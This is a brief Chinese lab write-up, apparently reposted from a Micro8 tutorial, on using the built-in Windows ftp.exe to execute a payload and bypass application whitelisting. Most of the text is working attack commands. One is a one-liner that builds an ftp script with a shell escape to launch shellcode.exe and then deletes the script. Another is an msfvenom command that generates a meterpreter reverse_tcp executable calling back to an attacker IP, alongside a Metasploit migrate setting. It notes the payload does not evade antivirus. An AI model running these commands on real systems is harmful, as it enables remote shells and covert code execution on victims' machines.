0x00 Ftp.exe简介:
Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。
0x01 环境
攻击机 kali 192.168.5.102
靶机 win7 192.168.5.101
装有av
0x02复现
攻击机,注意配置set AutoRunScript migrate f
靶机echo !C:\Users\administrator\Desktop\shellcode.exe > o &echo quit >> o &ftp ‐n ‐s:o &del /F /Q o
弹回
0x03 shellcode.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f exe > shellcode.exe
0x04 总结
不过av
0x05借鉴
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/88_基于白名单Ftp.exe执行payload第十九季.html